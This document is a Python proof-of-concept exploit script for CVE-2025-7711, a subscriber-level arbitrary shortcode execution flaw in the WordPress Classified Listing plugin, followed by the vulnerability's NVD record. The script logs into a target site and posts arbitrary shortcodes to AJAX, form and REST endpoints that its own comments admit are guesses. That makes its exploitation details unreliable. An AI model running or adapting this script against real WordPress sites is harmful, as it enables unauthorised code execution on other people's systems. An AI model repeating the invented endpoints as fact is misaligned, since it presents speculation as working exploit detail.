CVE-2025-7711

# CVE-2025-7711 PoC - Arbitrary Shortcode Execution # Affected Plugin: The Classified Listing - Classified ads & Business Directory Plugin # Affected Versions: <= 5.0.3 # Access Required: Subscriber-level account or higher import requests from bs4 import BeautifulSoup TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def cve_2025_7711_poc(): """ PoC for arbitrary shortcode execution via Classified Listing plugin The vulnerability exists because do_shortcode() is called without proper validation of user-supplied input in FilterHooks.php """ session = requests.Session() # Step 1: Login as subscriber-level user login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } login_response = session.post(login_url, data=login_data) if 'logged-in' not in login_response.text: print("[-] Login failed") return False print("[+] Login successful as subscriber") # Step 2: Trigger the vulnerable shortcode execution # The exact parameter depends on the vulnerable endpoint # Common patterns: # Example 1: Via AJAX endpoint ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'classified_listing_shortcode', # Example action 'shortcode': '[wp_admin]', # Arbitrary shortcode } ajax_response = session.post(ajax_url, data=exploit_data) # Example 2: Via front-end form submission form_url = f"{TARGET_URL}/listing-submission/" form_data = { 'shortcode_input': '[theme_options]', # Arbitrary shortcode 'submit': 'Submit' } form_response = session.post(form_url, data=form_data) # Example 3: Via REST API api_url = f"{TARGET_URL}/wp-json/classified-listing/v1/shortcode" api_data = { 'code': '[any_registered_shortcode]' } api_response = session.post(api_url, json=api_data) # Check for successful exploitation indicators if 'dashboard' in ajax_response.text or 'options' in form_response.text: print("[+] Vulnerability confirmed - arbitrary shortcode executed") print(f"[+] Response contains: {ajax_response.text[:500]}") return True print("[*] PoC may need adjustment based on actual vulnerable endpoint") return False if __name__ == "__main__": cve_2025_7711_poc()

{"cve": {"id": "CVE-2025-7711", "sourceIdentifier": "[email protected]", "published": "2025-11-17T23:15:56.713", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.0.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/classified-listing/tags/5.0.2/app/Controllers/Hooks/FilterHooks.php#L367", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d9b10db9-0c7c-4f13-9d98-6d407446cfb8?source=cve", "source": "[email protected]"}]}}